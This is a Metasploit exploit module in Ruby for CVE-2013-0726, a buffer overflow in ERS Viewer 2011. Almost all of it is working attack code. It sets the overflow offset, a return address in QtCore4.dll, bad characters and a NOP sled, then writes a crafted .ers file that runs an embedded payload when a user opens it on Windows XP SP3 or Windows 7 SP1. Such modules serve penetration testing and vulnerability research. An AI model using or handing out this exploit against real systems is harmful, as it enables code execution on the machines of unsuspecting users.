## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT def initialize(info={}) super(update_info(info, 'Name' => "ERS Viewer 2011 ERS File Handling Buffer Overflow", 'Description' => %q{ This module exploits a buffer overflow vulnerability found in ERS Viewer 2011 (version 11.04). The vulnerability exists in the module ermapper_u.dll where the function ERM_convert_to_correct_webpath handles user provided data in a insecure way. It results in arbitrary code execution under the context of the user viewing a specially crafted .ers file. This module has been tested successfully with ERS Viewer 2011 (version 11.04) on Windows XP SP3 and Windows 7 SP1. }, 'License' => MSF_LICENSE, 'Author' => [ 'Parvez Anwar', # Vulnerability Discovery 'juan vazquez' # Metasploit ], 'References' => [ [ 'CVE', '2013-0726' ], [ 'OSVDB', '92694' ], [ 'BID', '59379' ], [ 'URL', 'http://secunia.com/advisories/51725/' ] ], 'Payload' => { 'Space' => 7516, 'BadChars' => "\x22\x5c" + (0x7f..0xff).to_a.pack("C*") + (0x00..0x08).to_a.pack("C*") + (0x0a..0x1f).to_a.pack("C*"), 'DisableNops' => true, 'EncoderOptions' => { 'BufferRegister' => 'ESP' } }, 'SaveRegisters' => [ 'ESP' ], 'DefaultOptions' => { 'ExitFunction' => "process", }, 'Platform' => 'win', 'Targets' => [ [ 'ERS Viewer 2011 (v11.04) / Windows XP SP3 / Windows 7 SP1', { 'Offset' => 260, 'Ret' => 0x67097d7a # push esp # ret 0x08 from QtCore4.dll } ], ], 'Privileged' => false, 'DisclosureDate' => "Apr 23 2013", 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [ true, 'The file name.', 'msf.ers']), ], self.class) end # Rewrote it because make_nops is ignoring SaveRegisters # and corrupting ESP. def make_nops(count) return "\x43" * count # 0x43 => inc ebx end def exploit buf = rand_text(target['Offset']) buf << [target.ret].pack("V") buf << make_nops(8) # In order to keep ESP pointing to the start of the shellcode buf << payload.encoded ers = %Q| DatasetHeader Begin Name = "#{buf}" DatasetHeader End | file_create(ers) end end